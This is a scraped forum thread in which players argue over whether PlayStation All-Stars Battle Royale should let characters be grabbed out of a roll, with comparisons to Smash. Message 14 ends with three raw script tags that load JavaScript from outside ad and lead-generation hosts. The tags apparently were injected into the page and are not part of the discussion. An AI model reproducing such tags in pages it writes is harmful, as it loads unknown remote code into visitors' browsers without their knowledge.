Showing results for 
Search instead for 
Do you mean 
Hekseville Citizen
295 posts

Re: You shouldn't be able to grab people out of a roll.

Jan 12, 2013

RedLegend14 wrote:

It's not lag, it happens in offline matches too. It's also possible to get hit or killed during a roll.

So they lied to us when saying that we can roll out of a super.

Please use plain text.
Message 11 of 15 (56 Views)
0 Likes
Lombax Warrior
239 posts

[ Edited ]
Jan 13, 2013

I honestly feel that taking way the ability to grab someone out of roll gets rid of a lot of depth this game has. As someone said before, it could turn this game into a whiff and roll fest.

- Characters with good rolls (Fat Princess, etc..) will have an easy way out of pressure with little to no risk. Not to mention that it's hard to punish some characters who have longer rolls.

- Grabs in general will be harder to pull off.

- Some characters' great tech chasing games would be ruined ( Sweet Tooth, Big Daddy) which arguably keeps them viable in 1 v1.

- Mix ups involving throws will be virtually unusable.

- There will be much less of a risk when cornered.

-  Some characters have a hard  time punishing rolls as is.

Please use plain text.
Message 12 of 15 (52 Views)
Hekseville Citizen
282 posts

[ Edited ]
Jan 13, 2013

PinaChronic wrote:

Rolling should be invulnerability until the roll is over... like Smash. Makes absolutely no sense why you can still get hit... it's the same as teching in the air.

Here is the one that said it should be like smash, and had it on his mind lol. 

That being said, grab through roll is a necessity. You can just jump wake up game out of it either way. Its not hard to avoid, and only punishes if you attempt to wake up roll behind.

Check out my channel for Combo Videos and Tournament matches!
www.youtube.com/mogilsumi
Please use plain text.
Message 13 of 15 (35 Views)
0 Likes
Gaming Beast
2167 posts

Jan 13, 2013

PinaChronic wrote:

Rolling should be invulnerability until the roll is over... like Smash. Makes absolutely no sense why you can still get hit... it's the same as teching in the air.

Well here's the thing, in Smash it would be dumb, but in this game it's necessary. In smash, rolls were not fully invincible and had a decent amount of ending lag you could punish. In this game, unless you're playing someone like Big Daddy, rolls are mostly invincible, rather fast and have little ending lag. Add to that the fact that this game doesn't have down smashes which hit both sides. Without being able to grab people out of rolls, rolls would be stupidly OP in this game.

GaleDaWindMasta wrote:

gmoney0505 wrote:

This isnt smash and doesnt need to be Smash. Getting grabbed out of a roll is great. With people have does insane little recovery frames, grabbing them out of their roll is great.The only way a person can get hit is by the grab. Keeps people from tryingto abuse the hell out of it.

No one is trying to make this like Smash. -_-

Where's the logic that not being able to grab people out of a roll would automatically make this game more like Smash?

Why even bother keeping Smash in your mind when talking about this game? I usually don't. I'm playing Battle Royale. I raise points I think would make this game better. Not make it like Smash. 

Also, I already pointed out that people who abuse rolling are easy to punish. Or did you skip that?

Maybe because someone else made references to Smash, and you liked the comment that literally said "Smash doesn't have it and neither should this"? Don't just act like he brought this out of thin air.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Please use plain text.
Message 14 of 15 (23 Views)
Hekseville Citizen
282 posts

Jan 13, 2013

^^ thank you fromundaman lol. I was giggling at this forum.. like i do 90% of them haha

Check out my channel for Combo Videos and Tournament matches!
www.youtube.com/mogilsumi
Please use plain text.
Message 15 of 15 (20 Views)
0 Likes